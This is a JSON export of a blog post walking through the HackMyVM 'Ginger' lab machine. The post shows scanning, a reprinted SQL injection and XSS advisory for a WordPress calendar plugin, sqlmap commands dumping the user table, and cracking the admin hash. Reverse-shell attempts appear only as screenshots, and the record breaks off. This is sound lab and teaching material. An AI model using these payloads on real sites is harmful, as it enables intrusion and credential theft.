{"id":893,"date":"2025-06-19T13:01:26","date_gmt":"2025-06-19T05:01:26","guid":{"rendered":"http:\/\/162.14.82.114\/?p=893"},"modified":"2025-06-19T13:01:26","modified_gmt":"2025-06-19T05:01:26","slug":"hmv-_-ginger","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/893\/06\/19\/2025\/","title":{"rendered":"hmv[-_-] Ginger"},"content":{"rendered":"<h1>Ginger<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300864.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300864.png\" alt=\"image-20250619011023544\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300866.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300866.png\" alt=\"image-20250619074140801\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we&#039;re dating.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.104:22\nOpen 192.168.10.104:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhemxEZcm98GFwIRozVUePnC+Cejni5lScAa7ha5neDlWQT2e6dbubOkddku\/qgtgY4\/kw\/pGPh7oTqHg9WKHTMqTAzdN0DDaU\/5twewwMf6s9ERuuYYieP7mzjsX2APhOr23CFWVr37Y+mQ\/A4J0ODizpr\/mggCCi6kqHqyRWgcPG98AVJ9IjPehVkptQdLpQlSOV8EzJClu6tBInWzxtGi5v0B94lMYRDXqZE9Z1wCSh9oU0HnwRwfFqB0dcOH+kDZVLYi06aiHKXkKgSFM3G6LJQY8ad4FCEc7TU+agLRPHFUPFqqPbf9hbDD7MUdR4pXEQtJ1p\/D\/9rdbBg1Sp\n|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+zmcUltQUYUVvvfWqtUjdFpCh0IkOnPjmcctTpnXS7MWK37n6h9DEq4WNsHmauyKEuRnml5mOLUbNIZHHUBgY=\n|   256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNArrcR981CzORruPnEn\/opg56t7SFktwnhZzGpXcfE\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\nMAC Address: 08:00:27:F1:09:3C (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.10.104\/\n[+] Method:                  GET\n[+] Threads: 
                10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,zip,php,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 279]\n\/index.html           (Status: 200) [Size: 10701]\n\/.php                 (Status: 403) [Size: 279]\n\/wordpress            (Status: 301) [Size: 320] [--&gt; http:\/\/192.168.10.104\/wordpress\/]\n\/latest.zip           (Status: 200) [Size: 16866701]\n\/.php                 (Status: 403) [Size: 279]\n\/.html                (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]<\/code><\/pre>\n<h3>WordPress Information Gathering<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ cmseek -u http:\/\/192.168.10.104\/wordpress\/\n\n[+]  CMS Detection And Deep Scan  [+] \n\n[i] Scanning Site: http:\/\/192.168.10.104\/wordpress\/\n[*] CMS Detected, CMS ID: wp, Detection method: header\n[*] Version Detected, WordPress Version 5.7.2\n[i] Checking user registration status\n[i] Starting passive plugin enumeration\n[x] No plugins enumerated!\n[i] Starting passive theme enumeration\n[*] 1 theme detected!\n[i] Starting Username Harvest\n[i] Harvesting usernames from wp-json api\n[!] Json api method failed trying with next\n[i] Harvesting usernames from jetpack public api\n[!] No results from jetpack api... 
maybe the site doesn&#039;t use jetpack\n[i] Harvesting usernames from wordpress author Parameter\n[*] Found user from source code: webmaster\n[*] 1 Usernames was enumerated\n[i] Checking version vulnerabilities using wpvulns.com\n[x] Error Retriving data from wpvulndb\n\n ___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  Deep Scan Results  [+] \n\n \u250f\u2501Target: 192.168.10.104\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Version: 5.7.2\n \u2503    \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Readme file found: http:\/\/192.168.10.104\/wordpress\/\/readme.html\n \u2503    \u251c\u2500\u2500 License file: http:\/\/192.168.10.104\/wordpress\/\/license.txt\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Theme: twentytwentyone\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 1.3\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/192.168.10.104\/wordpress\/\/wp-content\/themes\/twentytwentyone\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Usernames harvested: 1\n \u2503    \u2502    \u2570\u2500\u2500 webmaster\n \u2503    \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Ginger\/Result\/192.168.10.104_wordpress\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 1.49 Seconds, using 45 Requests\n\n CMSeeK says ~ au revoir<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ wpscan --url http:\/\/$IP\/wordpress -e u vp --api-token xxxxxxxxxxxxxx\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 
&lt;===============================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:00\n[i] User(s) Identified:\n\n[+] webmaster\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.10.104\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Sensitive Directories<\/h3>\n<p>Found an archive; try extracting it:<\/p>\n<pre><code class=\"language-bash\"># wget http:\/\/$IP\/latest.zip\n# unzip latest.zip\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ tree wordpress\n---------------\n293 directories, 2184 files<\/code><\/pre>\n<p>Tried to do some information gathering here, but there are simply too many files:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300867.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300867.png\" alt=\"image-20250619081602187\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h3>WordPress Plugin SQL Injection Vulnerability<\/h3>\n<p>It looks like a default install... Try enumerating the plugins; if that fails, the only options left are more information gathering, SQL injection against the login page, or brute force:<\/p>\n<pre><code class=\"language-bash\"># wpscan --url http:\/\/$IP\/wordpress -e vp  --plugins-detection mixed --disable-tls-checks --api-token xxxxxxxxxx\n[i] Plugin(s) Identified:\n\n[+] cp-multi-view-calendar\n | Location: http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/\n | Latest Version: 1.4.32\n | Last Updated: 2025-04-14T12:46:00.000Z\n | Readme: http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/README.txt\n | [!] Directory listing is enabled\n |\n | Found By: Known Locations (Aggressive Detection)\n |  - http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/, status: 200\n |\n | [!] 6 vulnerabilities identified:\n |\n | [!] Title: CP Multi View Event Calendar &lt;= 1.0.1 - SQL Injection\n |     Fixed in: 1.0.2\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/22664ce3-6321-42af-9382-c2d82b5640d7\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-8586\n |      - https:\/\/www.exploit-db.com\/exploits\/35073\/\n |      - https:\/\/packetstormsecurity.com\/files\/128814\/\n |\n | [!] Title: CP Multi View Event Calendar &lt;= 1.1.4 - SQL Injection &amp; XSS\n |     Fixed in: 1.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/50db43be-9fdb-4b5f-bba5-4c0d62689dbf\n |      - https:\/\/www.exploit-db.com\/exploits\/36243\/\n |      - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_cp_calendar_sqli\/\n |\n | [!] 
Title: CP Multi View Event Calendar &lt;= 1.1.7 - Unauthenticated SQL Injection\n |     Fixed in: 1.1.8\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11\n |      - https:\/\/www.exploit-db.com\/exploits\/37560\/\n |\n | [!] Title: Calendar Event Multi View &lt; 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)\n |     Fixed in: 1.4.01\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-24498\n |      - https:\/\/plugins.trac.wordpress.org\/changeset\/2557721\/cp-multi-view-calendar\n |\n | [!] Title: Calendar Event Multi View &lt; 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS\n |     Fixed in: 1.4.07\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/95f92062-08ce-478a-a2bc-6d026adf657c\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-2846\n |\n | [!] 
Title: Calendar Event Multi View &lt; 1.4.07 - Unauthenticated Arbitrary Event Deletion\n |     Fixed in: 1.4.07\n |     Reference: https:\/\/wpscan.com\/vulnerability\/5f191d25-833b-4d8d-a4ff-d180a326dd82\n |\n | The version could not be determined.<\/code><\/pre>\n<p>Checking <code>http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\/README.txt<\/code> shows that the installed version is very old, so search for a matching exploit:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300868.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300868.png\" alt=\"image-20250619083153163\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ searchsploit -m php\/webapps\/36243.txt\n  Exploit: WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection\n      URL: https:\/\/www.exploit-db.com\/exploits\/36243\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/36243.txt\n    Codes: OSVDB-119277, OSVDB-119276, OSVDB-118336, OSVDB-118324\n Verified: True\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/Ginger\/36243.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ cat 36243.txt \n# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4  [SQL Injection\nvulnerabilities]\n# Date: 2015-02-28\n# Google 
Dork: Index of \/wordpress\/wp-content\/plugins\/cp-multi-view-calendar\n# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]\n# Vendor Homepage: http:\/\/wordpress.dwbooster.com\/\n# Software Link:\nhttps:\/\/downloads.wordpress.org\/plugin\/cp-multi-view-calendar.1.1.4.zip\n# Version: 1.1.5\n# Tested on: windows 7 ultimate + sqlmap 0.9. It&#039;s php aplication\n# OWASP Top10: A1-Injection\n# Mitigations: Upgrade to version 1.1.5\n\nGreetz to Christian Uriel Mondragon Zarate\n\nVideo demo of unauthenticated user sqli explotation vulnerability :\n\n###################################################################\n\nADMIN PAGE SQL INJECTION\n-------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/wp-admin\/admin-ajax.php?action=ajax_add_calendar\n\nsqlinjection in post parameter viewid\n\n-------------------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/wp-admin\/admin-ajax.php?action=ajax_delete_calendar\n\nsqlinjection in post parameter id\n\n########################################\n\nUNAUTENTICATED SQL INJECTION\n-----------------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1\n\nsql injection in id parameter\n\n-----------------------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1\n\ndatapost viewtype=list&amp;list_order=asc vuln variable list_order\n\n################################################################\n\nCROSSITE SCRIPTING VULNERABILITY\n----------------------------------------------------------\n\nhttp:\/\/localhost\/wordpress\/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1\n\ncrosite script weekstartday 
parameter\n\n###################################################\n\n==================================\n\ntime-line\n\n26-02-2015: vulnerabilities found\n27-02-2015: reported to vendor\n28-02-2015: release new cp-multi-view-calendar version 1.1.4\n28-02-2015: full disclousure\n\n===================================<\/code><\/pre>\n<p>There are several SQL injection vulnerabilities; pick any one of them to test:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/$IP\/wordpress\/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1&quot; --batch --dbs\n\nGET parameter &#039;id&#039; is vulnerable. Do you want to keep testing the others (if any)? [y\/N] N\nsqlmap identified the following injection point(s) with a total of 271 HTTP(s) requests:\n---\nParameter: id (GET)\n    Type: time-based blind\n    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1 AND (SELECT 9875 FROM (SELECT(SLEEP(5)))sicY)\n---\n\navailable databases [2]:\n[*] information_schema\n[*] wordpress_db\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/$IP\/wordpress\/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1&quot; --batch -D wordpress_db --tables\n\n[16 tables]\n+------------------------+\n| wp_commentmeta         |\n| wp_comments            |\n| wp_dc_mv_calendars     |\n| wp_dc_mv_configuration |\n| wp_dc_mv_events        |\n| wp_dc_mv_views         |\n| wp_links               |\n| wp_options             |\n| wp_postmeta            |\n| wp_posts               |\n| wp_term_relationships  |\n| wp_term_taxonomy       |\n| wp_termmeta            |\n| wp_terms               |\n| wp_usermeta            |\n| wp_users               
|\n+------------------------+\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/$IP\/wordpress\/?action=data_management&amp;cpmvc_do_action=mvparse&amp;f=edit&amp;id=1&quot; --batch -D wordpress_db -T wp_users --dump\nDatabase: wordpress_db\nTable: wp_users\n[1 entry]\n+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+\n| ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |\n+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+\n| 1  | http:\/\/192.168.0.14\/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | &lt;blank&gt;             |\n+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+<\/code><\/pre>\n<p>Try to crack <code>webmaster:$P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ hash-identifier\n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   
\\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.\n\nPossible Hashs:\n[+] MD5(WordPress)\n--------------------------------------------------\n HASH: ^C\n\n        Bye!<\/code><\/pre>\n<p>Try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ echo &#039;$P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.&#039; &gt; hash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 4 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nsanitarium       (?)     
\n1g 0:00:00:04 DONE (2025-06-18 21:13) 0.2008g\/s 20086p\/s 20086c\/s 20086C\/s shunda..rosnah\nUse the &quot;--show --format=phpass&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>Got the password!!!! Try logging in with the credentials <code>webmaster:sanitarium<\/code> at: <code>http:\/\/192.168.10.104\/wordpress\/wp-login.php<\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300869.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300869.png\" alt=\"image-20250619091611105\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300870.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300870.png\" alt=\"image-20250619091628763\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<h3>Reverse Shell<\/h3>\n<p>Try modifying a <code>php<\/code> configuration file so that a shell connects back; I chose the <code>404<\/code> one in the theme templates:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300871.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300871.png\" alt=\"image-20250619092052723\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Tried inserting a reverse shell, but it shows:<\/p>\n<blockquote>\n<p>Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. 
You will need to upload your PHP file change by some other means, such as by using SFTP.<\/p>\n<\/blockquote>\n<p>... Found the version number:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300872.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300872.png\" alt=\"image-20250619093945091\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Not much use. While trying things I found that plugin scripts can be edited, so try inserting a reverse shell there:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300873.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300873.png\" alt=\"image-20250619094254240\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try activating it:<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300874.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300874.png\" alt=\"image-20250619094404483\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Uh...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300875.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300875.png\" alt=\"image-20250619094612765\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The only option left is to upload a plugin to get the reverse shell:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300876.png'><img class=\"lazyload lazyload-style-2\" 
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300876.png\" alt=\"image-20250619094802030\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>The only option is to download a plugin, insert the reverse shell into it, and upload it...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300877.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300877.png\" alt=\"image-20250619095349577\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300878.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300878.png\" alt=\"image-20250619095400181\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then activated the plugin, but no shell came back... Great. Try uploading a plugin with a known RCE vulnerability:<\/p>\n<blockquote>\n<p><a href=\"https:\/\/github.com\/elementor\/elementor\/releases\/download\/v3.6.0-beta4\/elementor-3.6.0-beta4.zip\">https:\/\/github.com\/elementor\/elementor\/releases\/download\/v3.6.0-beta4\/elementor-3.6.0-beta4.zip<\/a><\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/50882\">https:\/\/www.exploit-db.com\/exploits\/50882<\/a><\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300879.png'><img class=\"lazyload lazyload-style-2\" decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300879.png\" alt=\"image-20250619101139860\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Unbelievable... Try: <a href=\"https:\/\/www.exploit-db.com\/exploits\/51826\">https:\/\/www.exploit-db.com\/exploits\/51826<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300880.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300880.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619101500521\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Activate it, and then...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300881.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300881.png\" 